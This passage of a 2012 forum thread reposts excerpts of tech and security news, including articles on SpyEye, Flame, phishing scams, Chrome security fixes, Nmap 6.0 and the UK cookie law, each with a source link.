"So.cl is an experimental research project, developed by Microsoft's FUSE Labs, focused on exploring the possibilities of social search for the purpose of learning," a frequently-asked-questions page at the website said.
"So.cl combines social networking and search to help people find and share interesting Web pages in the way students do when they work together."
The online community had previously only welcomed students studying information and design at select US universities.
As of Monday, those interested in getting involved with the social network were invited to send messages to socl@microsoft.com.

Read more at :-
http://phys.org/news/2012-05-microsoft-social-affa...

--
Was this reply relevant?
+0
-0
mogs CClip 112
Expert Contributor 22nd May, 2012 21:15
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Windows Vista infection rates climb, says Microsoft
End of support last year for SP2 responsible for spike in successful attacks

By Gregg Keizer
May 22, 2012 01:29 PM ET
Computerworld - Microsoft said last week that a skew toward more exploits on Windows Vista can be attributed to the demise of support for the operating system's first service pack.

Data from the company's newest security intelligence report showed that in the second half of 2011, Vista Service Pack 1 (SP1) was 17% more likely to be infected by malware than Windows XP SP3, the final upgrade to the nearly-11-year-old operating system.

That's counter to the usual trend, which holds that newer editions of Windows are more secure, and thus exploited at a lower rate, than older versions like XP. Some editions of Windows 7, for example, boast an infection rate half that of XP.

Tim Rains, the director of Microsoft's Trustworthy Computing group, attributed the rise of successful attacks on Vista SP1 to the edition's retirement from security support.

"This means that Windows Vista SP1-based systems no longer automatically receive security updates and helps explain why there [was] a sudden and sharp increase in the malware infection rate on that specific platform," said Rains in a blog post last week.

Microsoft stopped delivering patches for Vista SP1 in July 2011. For the bulk of the reporting period, then, Vista SP2 users did not receive fixes to flaws, including some that were later exploited by criminals.

Vista SP2 will continue to be patched until mid-April 2017.

Read more at :-
http://www.computerworld.com/s/article/9227384/Win...

--
Was this reply relevant?
+0
-0
mogs CClip 113
Expert Contributor 22nd May, 2012 21:20
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Banking malware spies on victims by hijacking webcams, microphones, researchers say
The SpyEye variant secretly films and records what victims say and do when they are being defrauded

By Lucian Constantin
May 22, 2012 12:07 PM ET
IDG News Service - A new variant of SpyEye malware allows cybercriminals to monitor potential bank fraud victims by hijacking their webcams and microphones, according to security researchers from antivirus vendor Kaspersky Lab.

SpyEye is a computer Trojan horse that specifically targets online banking users. Like its older cousin, Zeus, SpyEye is no longer being developed by its original author, but is still widely used by cybercriminals in their operations.

SpyEye's plug-in-based architecture allows third-party malware developers to extend its original functionality, Kaspersky Lab malware researcher Dmitry Tarakanov said in a blog post on Monday. This is exactly what happened with the new webcam and microphone spying feature, which is implemented as a SpyEye plug-in called flashcamcontrol.dll, Tarakanov said.

More at :-
http://www.computerworld.com/s/article/9227387/Ban...

--
Was this reply relevant?
+0
-0
mogs CClip 114
Expert Contributor 22nd May, 2012 21:24
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Beta Channel Update
Tuesday, May 22, 2012 | 09:15
Labels: Beta updates

The Beta channel has been updated to 20.0.1132.11 for Windows, Mac, Linux, and Chrome Frame. This build contains several bug and stability fixes. Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
Was this reply relevant?
+0
-0
mogs CClip 115
Expert Contributor 22nd May, 2012 21:30
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Paysafecard PINs Sold Over The Internet Linked To Fraud
22 May, 2012

Scammers are taking advantage of the payment method's customers.

Paysafecard PINs sold over the Internet are increasingly being linked to fraud, the Vienna-based company warns.

The electronic payment method billed as "cash for the Internet" uses a pre-paid system and does not require debit or credit cards. The service, which is regulated in the UK by the Financial Services Commission, aims to function like cash instead.

Customers can purchase secure 16-digit PINs, printed on the back of a card or voucher, from one of 350,000 official sales outlets worldwide, and then spend that money at any of 3,500 authorised online shops, many of which are gaming-related.

But there is a growing trend of PINs being sold over the Internet for sums below their actual value, a practice that violates Paysafecard's terms and conditions. The overwhelming majority of these are fraudulent, with users discovering the cards have previously been used or locked only while attempting to redeem them.



Read more: http://www.itproportal.com/2012/05/22/paysafecard-...

--
Was this reply relevant?
+0
-0
mogs CClip 116
Expert Contributor 22nd May, 2012 21:38
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft's Rozzle bolsters drive-by malware defences Microsoft researchers have shown off a new anti-malware tool which could be used to defeat so-called drive-by attacks, where users' computers are infected without them actively installing rogue software.
Drive-by attacks typically rely on vulnerabilities in JavaScript but are near-impossible for traditional static and runtime anti-malware tools to detect, according to the researchers.
These JavaScript attacks typically target specific browsers running certain plugins. Unless the malware detects that specific set up, the trap will not be sprung, which makes it hard to detect.
But Benjamin Livshits and Benjamin Zorn of Microsoft Research, along with Clemens Kolbitsch from the Technical University of Vienna have devised a virtual machine tool, known as Rozzle [PDF], which dramatically improves detection of the JavaScript threats.
Rozzle is a JavaScript virtual machine that can simultaneously mimic different set-ups by presenting the malware with multiple execution paths, increasing the likelihood that it can be detected. In effect, it provides a tool to decloak this hidden JavaScript malware.

Read more at :-
http://www.v3.co.uk/v3-uk/news/2178656/microsofts-...

--
Was this reply relevant?
+0
-0
mogs CClip 117
Expert Contributor 23rd May, 2012 12:17
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Social media off to war with propaganda posts

Disinformation campaigns will start with NSFW honeypots
By Simon Sharwood, APAC Editor • Get more from this author

Posted in Security, 22nd May 2012 20:15 GMT
Social media posts which lure readers with the promise of illegal, amoral or forbidden products and services may become a cold war cyber weapon, according to Kaspersky Labs CEO Eugene Kaspersky.

Speaking to The Register in Sydney yesterday Kaspersky said the usual suspects – Duqu, Stuxnet, whatever happened in Estonia and the regular data deletions apparently plaguing Iran – are all jolly good examples of cyberwar in action, but require a concerted effort.

Easier-to-execute, attacks, he believes, will be fought through dodgy posts to social networks.

Kaspersky’s theory is that states will create handles on social networks that initially post information about illegal (dodgy downloads or drugs), amoral (smut) or forbidden products (drugs again) in order to attract an audience. Once followers or friends have been won, the feeds will turn to dispensing propaganda. Messages of this sort won’t be explicit, Kaspersky said, but will instead represent an attempt at mass manipulation.

More at :-
http://www.theregister.co.uk/2012/05/22/social_med...

--
Was this reply relevant?
+0
-0
mogs CClip 118
Expert Contributor 23rd May, 2012 13:12
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
'Do Not Track' system rapped over lack of renown
by James Dohnert The effectiveness of user privacy system, 'Do Not Track' (DNT) has been questioned by a prominent security expert, who argued that lack of user awareness is undermining the system.
The warning came from SANS Institute chief research officer Johannes Ullrich. He said that the lack of user awareness and requirement to opt-in nature would limit the DNT system.
DNT allows for users to opt out of tracking by various internet sites, including analytics services, advertising networks, and social platforms. By enabling a special HTML header in their browser preferences, users can request that sites refrain from tracking their activity.
Despite its support in internet browsers such as Firefox, Internet Explorer and Safari, DNT has yet to be adopted by many third-party websites. Experts believe the initiative is being held back because of its voluntary nature and lack of consumer awareness.
"There is no technical means to enforce use of the DNT header. Some legal protections are in the works, but as usual they will probably only apply to legitimate advertisers who are likely going to comply,' Ullrich said in a blog post.

More at :-
http://www.v3.co.uk/v3-uk/news/2178857/expert-outl...

--
Was this reply relevant?
+0
-0
mogs CClip 119
Expert Contributor 23rd May, 2012 13:19
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Malware Attacks On The Rise, Says McAfee
23 May, 2012
The security company warns that threats to desktop and mobile operating systems are increasing.

PC malware is higher than it has ever been in the last four years, McAfee revealed in a threat report covering the first quarter of 2012.

Despite previous reports citing Android as a primary target, McAfee researchers now warn that PC and laptop users are not off the hook. Between 2011 and the end of the first quarter of 2012, McAfee Labs traced some 83 million examples of malware, most instances of which were rootkits or password stealers.

The report also found that malware targeting Apple's desktop operating system has shown consistent growth, with a slight increase in the number of samples reported by the end of March.

Though McAfee suggests desktop and laptop users should beware, mobile operating systems continue to be victims to attacks.

Read more: http://www.itproportal.com/2012/05/23/malware-atta...

--
Was this reply relevant?
+0
-0
mogs CClip 120
Expert Contributor 23rd May, 2012 21:03
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 23rd May, 2012 21:06
Google warns users infected with DNSChanger as Web outage nears
Infected PCs and Macs trigger unusual warning on Google's search site

By Gregg Keizer
May 23, 2012 06:36 AM ET
Computerworld - Google on Tuesday hauled out a tool it last used nearly a year ago to warn users infected with the "DNSChanger" malware.

Starting Tuesday, special messages will be displayed at the top of a Google search results page to people whose Windows PCs and Macs have been infected with malicious code that hijacks their clicks.

"Our goal with this notification is to raise awareness of DNSChanger among affected users," said Damian Menscher, a Google security engineer, in a post to a company blog. "We believe directly messaging affected users on a trusted site and in their preferred language will produce the best possible results."

One security expert appreciated Google's effort.

"Let's face it, Google is basically a central piece of infrastructure now, and as such they have a responsibility to do their part to keep the pipes clean," said Andrew Storms, director of security operations at nCircle Security.

DNSChanger silently redirects clicks by modifying victimized computers' domain name system (DNS) settings. The users are sent to hacker-created websites that resemble the real domains.

More at :-
http://www.computerworld.com/s/article/9227397/Goo...

--
Was this reply relevant?
+0
-0
mogs CClip 121
Expert Contributor 23rd May, 2012 21:12
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 23rd May, 2012 21:14
Three Million UK Individuals Targeted By HMRC Scam
23 May, 2012hmrc scam email bitdefender antivirus security

Forged emails posing as HMRC aim to capitalise on those expecting payouts this year.

Antivirus company Bitdefender has detected a scam targeting three million people expecting tax refunds in the UK, via emails impersonating an officer of HM Revenue & Customs.

The emails include the HMRC logo at the top and are entitled ‘NOTICE OF TAX RETURN FOR YEAR 2011'. It usually states that the recipient is owed a tax rebate £209.87, with forms attached to complete the claim.

The phishing scam's aim is to collect sensitive authentication data to people's credit card or bank details from the completed form. Cyber criminals would thus have the vital information required for identity fraud and the emptying of victims' bank accounts.



Read more: http://www.itproportal.com/2012/05/23/three-millio...

--
Was this reply relevant?
+0
-0
mogs CClip 122
Expert Contributor 23rd May, 2012 21:20
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Windows XP update fails in infinite .NET patch loop

UPDATE: MSFT slow to publicise fix for faulty patch
By Simon Sharwood, APAC Editor • Get more from this author

Posted in CIO, 23rd May 2012 00:00 GMT
Microsoft has issued guidance on how to fix problems created by its last bunch of patches.

Redmond's patches for May brought pain to Windows XP users who have installed the .NET framework.

The problem seems to involve updates KB2633880, KB2518864 and KB2572073. Each download the updates and installs them, but then insists on downloading them again.

A post to this Microsoft Answers thread, says the bug affected a user as follows:

My PC says they installed successfully but as soon as I complete the installation they are back on my task bar waiting to be installed again.

Microsoft's guidance on how to address the issue can be found here and is dated as last having been reviewed on May 18th.

Read more at :-
http://www.theregister.co.uk/2012/05/23/windows_xp...

--
Was this reply relevant?
+0
-0
mogs CClip 123
Expert Contributor 23rd May, 2012 21:34
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Website address 'revolution' back in motion
by Glenn Chapman The Internet domain name "revolution" was back in action on Tuesday with the agency in charge of website addresses once again taking applications for online neighborhoods breaking the ".com" mold.
The Internet Corporation for Assigned Names and Numbers (ICANN) had put the process on hold after discovering a flaw that let some aspiring applicants peek at unauthorized information at the registration website.
"During the last few weeks, we have fixed the technical glitch that caused us to take the system offline," ICANN chief operating officer Akram Atallah said in a message at the agency's website.
The window for applying will remain open until the end of May 30 based on GMT time.
Those interested in running new generic top-level domains (gTLDs) online were assured the problem was fixed and that they could securely apply.
"We recognize and regret the inconvenience caused by this glitch," Atallah said.
In January, ICANN began taking applications from those interested in operating Internet domains that replace endings such as .com or .org with nearly any acceptable words, including company, organization or city names.
Outgoing ICANN president Rod Beckstrom has championed the change as a "new domain name system revolution."

More at :-
http://phys.org/news/2012-05-website-revolution-mo...

--
Was this reply relevant?
+0
-0
mogs CClip 124
Expert Contributor 24th May, 2012 10:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Chrome Stable Channel Update
Wednesday, May 23, 2012 | 15:15
Labels: Stable updates
The Chrome Stable channel has been updated to 19.0.1084.52 on Windows, Mac, Linux and Chrome Frame.

Security fixes and rewards:

Please see the Chromium security page for more detail. Note that the referenced bugs may be kept private until a majority of our users are up to date with the fix.

[117409] High CVE-2011-3103: Crashes in v8 garbage collection. Credit to the Chromium development community (Brett Wilson).
[118018] Medium CVE-2011-3104: Out-of-bounds read in Skia. Credit to Google Chrome Security Team (Inferno).
[$1000] [120912] High CVE-2011-3105: Use-after-free in first-letter handling. Credit to miaubiz.
[122654] Critical CVE-2011-3106: Browser memory corruption with websockets over SSL. Credit to the Chromium development community (Dharani Govindan).
[124625] High CVE-2011-3107: Crashes in the plug-in JavaScript bindings. Credit to the Chromium development community (Dharani Govindan).
[$1337] [125159] Critical CVE-2011-3108: Use-after-free in browser cache. Credit to “efbiaiinzinz”.
[Linux only] [$1000] [126296] High CVE-2011-3109: Bad cast in GTK UI. Credit to Micha Bartholomé.
[126337] [126343] [126378] [127349] [127819] [127868] High CVE-2011-3110: Out of bounds writes in PDF. Credit to Mateusz Jurczyk of the Google Security Team, with contributions by Gynvael Coldwind of the Google Security Team.
[$500] [126414] Medium CVE-2011-3111: Invalid read in v8. Credit to Christian Holler.
[127331] High CVE-2011-3112: Use-after-free with invalid encrypted PDF. Credit to Mateusz Jurczyk of the Google Security Team, with contributions by Gynvael Coldwind of the Google Security Team.
[127883] High CVE-2011-3113: Invalid cast with colorspace handling in PDF. Credit to Mateusz Jurczyk of the Google Security Team, with contributions by Gynvael Coldwind of the Google Security Team.
[128014] High CVE-2011-3114: Buffer overflows with PDF functions. Credit to Google Chrome Security Team (scarybeasts).
[$1000] [128018] High CVE-2011-3115: Type corruption in v8. Credit to Christian Holler.

Many of these bugs were detected using AddressSanitizer.

Full details about what changes are in this release are available in the SVN revision log. If you find a new issue, please let us know by filing a bug.


Anthony Laforge
Google Chrome

--
Was this reply relevant?
+0
-0
mogs CClip 125
Expert Contributor 24th May, 2012 10:48
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Windows 8 puts end to endless reboots
OS kicks out to recovery tools after second boot failure

By Gregg Keizer

Computerworld - Microsoft yesterday promised that a feature it's added to Windows 8 will put a stop to endless reboots.

Unlike earlier versions, Windows 8 will automatically call up a new menu with repair and recovery options when the software sniffs out problems getting the machine to boot or the OS to load properly.

In a post to the Building Windows 8 blog Tuesday, Chris Clark, a program manager with the user Experience team, described new tools embedded in the operating system designed to step in when a PC reboots more than twice because of problems.

Although Clark couched the changes as necessary because of increasingly-fast boot times -- meaning users are often unable to interrupt the process with traditional key presses like F2 or F8 -- one side effect is that endless reboots should be a thing of the past.
The problem has plagued Windows at times.

In 2008, an update to prep machines for the release of Vista Service Pack 1 (SP1) crippled PCs when it sent them into an endless cycle of rebooting.

More at :-
http://www.computerworld.com/s/article/9227411/Win...

--
Was this reply relevant?
+0
-0
mogs CClip 126
Expert Contributor 24th May, 2012 10:56
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Oracle slammed for outdated approach to Java security
by Shaun Nichols Oracle has fallen dangerously behind the times with the security policies and practices it utilises on its Java platform, according to one of Kaspersky Lab's top researchers.
Roel Schouwenberg, a senior antivirus researcher with the Kaspersky Lab global research and analysis team told V3 that Oracle has not kept pace with the security advances made by other companies in recent years.
"You can see that Microsoft has gone to sandboxing for Office, Adobe has gone that way, Google has gone that way with Chrome," Schouwenberg noted.
"When you look at what Oracle has done, the sad reality is nothing. And I have to ask why we are letting Oracle get away with this?"
According to figures from Kaspersky, Java remains a top target for malware writers and cyber criminals. Along with Adobe Reader and Flash, Java vulnerabilities are the most popular for online exploits which lead to malware infections.

More at :-
http://www.v3.co.uk/v3-uk/news/2179375/researcher-...

--
Was this reply relevant?
+0
-0
mogs CClip 127
Expert Contributor 24th May, 2012 21:54
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Yahoo! leaks! private! key! in! Axis! Chrome! debut!

Extension launch scuppered by certificate blunder
By Richard Chirgwin • Get more from this author

Posted in Enterprise Security, 24th May
Yahoo! today released its Axis extension for Chrome – and accidentally leaked its private security key that could allow anyone to create malicious plugins masquerading as official Yahoo! software.

Australian entrepreneur Nik Cubrilovic, who last year garnered notice for identifying Facebook's tracking cookies, revealed the certificate blunder on his blog, and said users should not install the extension “until the issue is clarified”.

Cubrilovic peeked into the extension’s source code and found the private certificate, which Yahoo! uses to sign the application to prove it is genuine and unaltered. The result, he says, is that a miscreant could forge a malicious extension that would be verified by Google's web browser as coming from Yahoo!

More at :-
http://www.theregister.co.uk/2012/05/24/yahoo_ship...

--
Was this reply relevant?
+0
-0
mogs CClip 128
Expert Contributor 24th May, 2012 22:00
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Windows 8 to Run Adobe Flash Only on Some Websites
By Ian Paul, PCWorld May 24, 2012 5:42 AM

The touch-centric Metro version of Internet Explorer 10 in Windows 8 is plug-in free, but the browser may still be able to run Adobe Flash video, according to an online report. Microsoft is reportedly taking the Google Chrome approach with IE10 and building Flash capability directly into the touch-friendly browser. But Flash won't be available for every site on the Web in Metro IE10. Instead, Microsoft will only extend the capability to select popular sites, according to Windows bloggers Paul Thurrott and Rafael Rivera.

Read more at :-
http://www.pcworld.com/article/256148/windows_8_to...

--
Was this reply relevant?
+0
-0
mogs CClip 129
Expert Contributor 25th May, 2012 09:12
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 25th May, 2012 09:14
Beta Channel Update
Thursday, May 24, 2012 | 17:15
Labels: Beta updates

The Beta channel has been updated to 20.0.1132.17 for Windows, Mac, Linux, and Chrome Frame. This build contains updates to v8 (3.10.8.10) and fixes for bugs and stability. Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
Was this reply relevant?
+0
-0
mogs CClip 130
Expert Contributor 25th May, 2012 10:21
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Researchers propose TLS extension to detect rogue SSL certificates
TACK TLS extension combines public key pinning with self-generated keys to validate SSL certificates

By Lucian Constantin

IDG News Service - A pair of security researchers have proposed an extension to the Transport Layer Security (TLS) protocol that would allow browsers to detect and block fraudulently issued SSL certificates.

Called TACK, short for Trust Assertions for Certificate Keys, the extension was developed by security researchers Trevor Perrin and Moxie Marlinspike and was submitted for consideration to the Internet Engineering Task Force (IETF), the body in charge of TLS, on Wednesday.

TACK tries to resolve the trust-related problems with the public key infrastructure that were highlighted by last year's security breaches at certificate authorities (CAs) Comodo and Diginotar.

Both of those breaches resulted in SSL certificates for high profile domains like google.com, hotmail.com or mail.yahoo.com, being issued fraudulently. In Diginotar's case, the certificates were even employed in active attacks against Google users in Iran.

At the moment, Web browsers trust over 600 organizations from around the world to issue SSL certificates. These organizations are known as certificate authorities and every one of them can technically issue a valid certificate for any domain on the Internet.

Several proposals to improve the current CA-based system have been put forward by Internet and security experts in the past 12 months, but there's no consensus regarding which one offers the best solution.

In November 2011, security engineers from Google proposed an HTTP extension called "public key pinning" that would allow websites to effectively tell browsers via an HTTP header which certificate authorities should be trusted to issue SSL certificates for their domain names.

The browsers would then remember (pin) this information and refuse to establish the connection if they receive a certificate signed by a different CA in the future. A more static implementation of this system already exists in Google Chrome for particular domain names, including Google's.

TACK is based on the same public key pinning concept, but instead of pinning CA public keys to particular domain names, it pins public keys generated by the domain owners themselves.

Read more at :-
http://www.computerworld.com/s/article/9227481/Res...

--
Was this reply relevant?
+0
-0
mogs CClip 131
Expert Contributor 25th May, 2012 10:30
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
NMap 6.0 arrives

Fyodor’s finest since 2009
By Simon Sharwood, APAC Editor

Posted in Security, 25th May 2012 07:15 GMT
Popular open source network discovery and security auditing tool Nmap has reached version 6.0.

The new code hit the Net last Monday, complete with a message from coder Gordon Lyon, aka Fyodor, that the new version represents “almost three years of work, 3,924 code commits, and more than a dozen point releases since the big Nmap 5 release in July 2009.”

Fyodor recommends all users upgrade to the new version, so they can get their hands on 289 new scripts and a host of new features. The six he rates most important are:

An enhanced scripting engine
Better web scanning
Full IPv6 support
A new Nping tool that can generate all sorts of packets
Improvements to the Zenmap GUI (pictured below)
Faster scanning

http://www.theregister.co.uk/2012/05/25/nmap_6_rel...

--
Was this reply relevant?
+0
-0
mogs CClip 132
Expert Contributor 25th May, 2012 10:39
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Cookie law: websites must seek consent from this weekend
COMMENTS (41)
By Dave Lee
Technology reporter, BBC News

The EU wants to put a stop to tracking cookies logging a user's activity without their knowledge
Friday marks the last working day for UK businesses to prepare their websites for a new law governing the use of cookies.

From Sunday, sites must obtain "informed consent" from visitors before saving cookies on a machine.

Cookies are pieces of personal data stored when users browse the web, sometimes to power advertising.

The Information Commissioners Office (ICO) is to launch a tool for the public to report non-compliant sites.

It is expected that the vast majority of websites will not be ready in time.

However, the ICO has said it would not take immediate action over non-compliant sites, and would instead offer guidance.

Tracking data
The rules are designed to tackle privacy issues resulting from the growing use of cookies which track users' browsing habits.

The guidelines, set by the EU, mean visitors must be told what cookies are being placed on their machine.

More at :-
http://www.bbc.co.uk/news/technology-18194235

--
Was this reply relevant?
+0
-0
mogs CClip 133
Expert Contributor 25th May, 2012 12:18
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft tops Google’s takedown requests

Firm sends half a million notices Google’s way
By Dave Neal
Fri May 25 2012, 09:48
INTERNET SEARCH OUTFIT Google has released its latest transparency report, a list of the takedowns and takedown requesters that it got over the previous year.
The numbers show that of the 1.2 million requests to remove URLs from Google's search results, over half a million came from Microsoft.
Microsoft made 540,000 requests for URL takedowns, aiming them at a range of targets. Google's data shows that it asked that search results linking to a range of wares and filesharing web sites be removed.
Google said that the number of takedown requests has increased dramatically. "The number of requests has been increasing rapidly. These days it's not unusual for us to receive more than 250,000 requests each week, which is more than what copyright owners asked us to remove in all of 2009," it said on its blog.
"In the past month alone, we received about 1.2 million requests made on behalf of more than 1,000 copyright owners to remove search results. These requests targeted some 24,000 different websites."

More at :-
http://www.theinquirer.net/inquirer/news/2179805/m...

--
Was this reply relevant?
+0
-0
mogs CClip 134
Expert Contributor 25th May, 2012 19:19
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
May 25th, 2012, 09:13 GMT · By Ionut IlascuBLOG
CCleaner 3.19 Bypasses UAC on Launch - Adds support for Firefox 13 beta and BitDefender products
One of the most requested features for CCleaner was bypassing the Windows User Account Control (UAC) dialog when launching the application. Piriform listened to the users and managed to achieve this in version 3.19 of its application.

The new option is available in the advanced configuration menu of the program and opens up a wide array of uses, such as scripting the application to work at boot time.

Additional modifications include support for Firefox 13 beta, improved cleaning operation for Firefox Aurora as well as for saved passwords in Google Chrome. Also improved in this release is the detection of scheduled tasks.

Starting this version, CCleaner adds cleaning for BitDefender software and improves detection for Malwarebytes Anti-Malware, VLC Media Player and avast! Antivirus.

CCleaner is available as a portable download from this link.

http://news.softpedia.com/news/CCleaner-3-19-Bypas...

--
Was this reply relevant?
+0
-0
mogs CClip 135
Expert Contributor 25th May, 2012 19:28
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
FBI, Obama Administration Create New Agency to Spy On Your Skype

The DCAC is charged with developing new digital surveillance technologies.

Enabled by the Obama administration, America’s Federal Bureau of Investigation (FBI) is on the brink of rolling out a specialist electronic surveillance unit with the power to spy on Skype conversations and other Internet and wireless communications.

The Domestic Communications Assistance Center (DCAC) is a joint effort between the FBI, U.S. Marshals Service, and Drug Enforcement Agency and is charged with developing the customised hardware necessary for new levels of digital reconnaissance.

Representing the technological nerve centre of the FBI’s “Going Dark” web surveillance drive, the new organisation is being bestowed with a wide-ranging mandate that covers everything from eavesdropping on live online conversations to creating more sophisticated wiretapping devices compatible with electronic devices.

Read more: http://www.itproportal.com/2012/05/25/fbi-obama-ad...

--
Was this reply relevant?
+0
-0
mogs CClip 136
Expert Contributor 27th May, 2012 22:54
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Opera is Facebook's best browser play
Reports peg No. 5 browser maker as takeover target
By Gregg Keizer
May 27, 2012 03:21 PM ET
Computerworld - Facebook may acquire Norwegian browser maker Opera Software, developer of the Opera and Opera Mini browsers for desktops and mobile phones, according to a report.

The purchase of Opera would give Facebook a way to quickly create a dedicated browser customized for the social networking giant and its estimated 900 million active monthly users.

It would also put Facebook in the middle of a browser battle with Microsoft (Internet Explorer), Mozilla (Firefox), Google (Chrome) and Apple (Safari). Some of those companies -- like Microsoft -- have partnered with Facebook, while others -- such as Google -- compete in the social networking space.

U.K.-based technology website Pocket-lint first reported Friday that Facebook "is looking to buy Opera Software," citing an unnamed source it described only as "trusted." Other sites, including The Next Web, claimed that while their sources could not verify Facebook's interest, they did say Opera's management has been talking to potential suitors.


Read more at :-
http://www.computerworld.com/s/article/9227516/Ope...

--
Was this reply relevant?
+0
-0
mogs CClip 137
Expert Contributor 27th May, 2012 23:06
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
About Qualys BrowserCheck

Qualys BrowserCheck is a cross-platform and cross-browser SaaS service that scans the user's browser looking for vulnerabilities in the browser itself and its plug-ins. This tool will also help you fix the security issues discovered by the scan.

Qualys BrowserCheck Business Edition is a version of BrowserCheck that allows an IT/network admin to create an account in BrowserCheck and to access a view of the browsers and plugins being used in their networks, with detailed data on vulnerabilities on the user level.

The threat of browser-based data breaches is growing. The number of vulnerabilities in browser plugins is on the rise. Now is the time to be proactive about the security of your web browser.

https://browsercheck.qualys.com/?scan_type=js

--
Was this reply relevant?
+0
-0
mogs CClip 138
Expert Contributor 28th May, 2012 11:41
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Google banned ads rocket to 134m
by Shaun Nichols Google said that its advertising business was forced to block roughly 134 million malicious and misleading submissions last year.
The company reported that its volume of disapproved advertisements more than doubled between 2010 and 2011, up from 56.4 million blocks in 2010 and just 25.3 million in 2008. Additionally, Google banned some 824,000 advertisers in 2011, up from 248,000 in 2010 and 18,000 in 2008.
Google said that the advertisements were removed for violating the terms and conditions of the Google and AdSense platforms. The terms prohibits ads which are misleading, linked to malware attacks and considered to be spam.
"Bad ads have a disproportionately negative effect on our users; even a single bad ad slipping through our defenses is one too many," Google director of advertising engineering David Baker said in a blog post.
"That’s why we’re constantly working to improve our systems and utilise new techniques to prevent bad ads from appearing on Google and our partner sites."

More at :-
http://www.v3.co.uk/v3-uk/news/2180060/google-bans...

--
Was this reply relevant?
+0
-0
mogs CClip 139
Expert Contributor 28th May, 2012 11:56
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Thousands of websites in breach of new cookie law Thousands of UK websites are now in breach of a law that dictates what they can log about visitors.

European laws that define what details sites can record in text files called cookies came into force on 26 May.

Cookies are widely used to customise what repeat visitors see on a site and by advertisers to track users online.

The Information Commissioner's Office (ICO) said it would offer help to non-compliant sites rather than take legal action against them.

Action plan
The regulations say websites must get "informed consent" from users before they record any detailed information in the cookies they store on visitors' computers.

Among websites that have complied with the law, getting consent has involved a pop-up box that explains the changes. Users are then asked to click to consent to having information recorded and told what will happen if they refuse.

UK firms have had 12 months to prepare for the change and the ICO has spent much of that time reminding businesses about their obligations.

More at :-
http://www.bbc.co.uk/news/technology-18206810

--
Was this reply relevant?
+0
-0
mogs CClip 140
Expert Contributor 28th May, 2012 21:21
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Complex cyberwar tool 'Flame' found ALL OVER Middle East

20 times larger than Stuxnet, two years old... and still active
By Brid-Aine Parnell

Posted in Enterprise Security, 28th May 2012 16:01 GMT
A new super-cyberweapon targeting countries like Iran and Israel that has been knocking around in computers for two years has been discovered by researchers.

"Flame", a highly sophisticated piece of malware, was unearthed by the International Telecommunication Union (ITU) and Kaspersky Lab, which said it was more complex and functional than any cyber threat it had seen to date.

Because Flame is so super-complicated and because of the geography of the attack, Kaspersky Lab's global research and analysis team head Alexander Gostev said he was in "no doubt" that it was a state-sponsored worm.

Flame is a cyber espionage program that steals data such as computer display contents, information about targeted systems, stored files, contact info and even audio conservations. Kaspersky Lab said that the worm's features were different from Duqu and Stuxnet, but it matched up with them when comparing where it attacked, the software vulnerabilities it uses and the fact that only certain computers were targeted.

"Stuxnet and Duqu belonged to a single chain of attacks, which raised cyberwar-related concerns worldwide," Eugene Kaspersky said in a canned statement. "The Flame malware looks to be another phase in this war, and it’s important to understand that such cyber weapons can easily be used against any country. Unlike with conventional warfare, the more developed countries are actually the most vulnerable in this case."

More at :-
http://www.theregister.co.uk/2012/05/28/kaspersky_...

--
Was this reply relevant?
+0
-0
mogs CClip 141
Expert Contributor 29th May, 2012 17:45
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Chrome to take world's top browser spot for May
In first for Google's browser, StatCounter's data shows Chrome ahead of IE for the month
By Gregg Keizer
May 29, 2012 06:09 AM ET
Computerworld - Google's Chrome is about to grab the top browser spot for a full month for the first time from Microsoft's Internet Explorer, data from a Web analytics company showed.

